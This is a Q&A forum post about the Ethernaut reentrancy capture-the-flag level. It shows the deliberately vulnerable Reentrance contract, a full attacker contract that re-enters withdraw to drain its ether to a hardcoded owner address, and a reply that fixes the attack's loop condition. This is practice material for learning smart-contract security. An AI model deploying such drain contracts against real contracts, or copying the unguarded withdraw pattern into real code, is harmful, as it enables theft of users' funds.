# Reentrancy Ethernaut Challenge

Tags: solidity, security, error, revert-opcode

I have been trying to pass the Reentrancy attack challenge of Ethernaut. Hence, I am creating this issue to ask help from anybody who knows where is the problem coming from.

First of all, here is the contract that I want to attack:

```
    // SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}
```

And now, this is the code I have written to steal all the available Ethers from the above contract:

```
pragma solidity 0.8.0;

contract Malicious {

  address public target;
  address payable public owner;

  constructor(address _destination) payable {
    target = _destination;
    owner = payable(0x61CC1f8d714451778e7A9bcf3dCeA6Dc4d10CB6e);
  }

  function acceptFunds() public payable {}

  function sendbackFunds() public {
    selfdestruct(owner);
  }

  function deposit() public payable {
    (bool success1, ) = target.call{value: 500000000000000000}(abi.encodeWithSignature("donate(address)", address(this)));
    require(success1, "Deposit did not succeed!");
  }

  function withdraw() public {
    (bool success2, ) = target.call(abi.encodeWithSignature("withdraw(uint)", 500000000000000000));
    require(success2, "Withdraw did not succeed!");
  }

  receive() external payable {
    (bool success, ) = target.call(abi.encodeWithSignature("withdraw(uint)", 500000000000000000));
    require(success, "Not successful!");
  }
}
```

As it is obvious, first i will fill my contract with some amount of Ethereum. Then I will execute deposit function which sends some predefined amount of Eth to the victim contract. At the end, I execute the withdraw function to make the victim contract stick in my virtual loop. However, while executing withdraw function of my contract I am given this error.

[image]

It is worth mentioning, I have used call method rather than ABI and Address of the target contract.

All in all, i cannot figure out why this error shows up whenever I try to pull my money out of the victim contract.

Thanks in advance

Answer (score 1):

You forget the loop terminator in your code when you are trying to re-entrance.

```
receive() external payable {
    uint targetBalance = address(targetContract).balance;
    if (targetBalance >= targetValue) {
        targetContract.withdraw(targetValue);
    }
}
```